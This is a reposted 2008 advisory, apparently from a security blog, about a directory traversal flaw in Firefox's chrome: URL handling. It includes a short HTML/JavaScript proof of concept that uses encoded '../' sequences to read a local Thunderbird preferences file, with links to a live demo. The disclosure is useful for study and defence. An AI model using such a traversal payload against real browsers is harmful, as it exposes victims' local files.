| 网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 |
|
| Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道 |
Firefox chrome: URL Handling Directory Traversal.
http://www.hiredhacker.com/2008/01/19/firefox-chrome-url-handling-directory-traversal/ 网管u家u.bitscn@com
I spent some time tonight with scripting access to chrome files and found that Firefox doesn’t properly handle escaped characters. Its possible to load any javascript file on a victims machine. This attack is similar to previously disclosed vulnerabilities but is not constrained to basic Firefox files. 网管bitscn_com
To exploit this the victim needs to have an extension installed that does not store its contents in a jar archive (such as the Download Statusbar). I created a demo that will read the Mozilla Thunderbird preferences file all.js (C:Program FilesMozilla Thunderbirdgreprefsall.js). 网管联盟bitsCN_com
This looks very interesting and may have bigger potential, but for now, its just another information disclosure. 网管联盟bitsCN_com
=============================== POC ================================
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script>
<script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e
%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files
%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>
=============================== POC ================================
网管联盟bitsCN@com
Additional Links: 网管网www_bitscn_com
Firefox Remote Variable Leakage.
http://www.0x000000.com/index.php?i=417 网管下载dl.bitscn.com
Download Statusbar
https://addons.mozilla.org/en-US/firefox/addon/26 网管网www.bitscn.com
Demo POC
http://hiredhacker.com/chrome.html 网管网www.bitscn.com
----------------------------------------------------------------------------------
|
0
|
评论加载中…
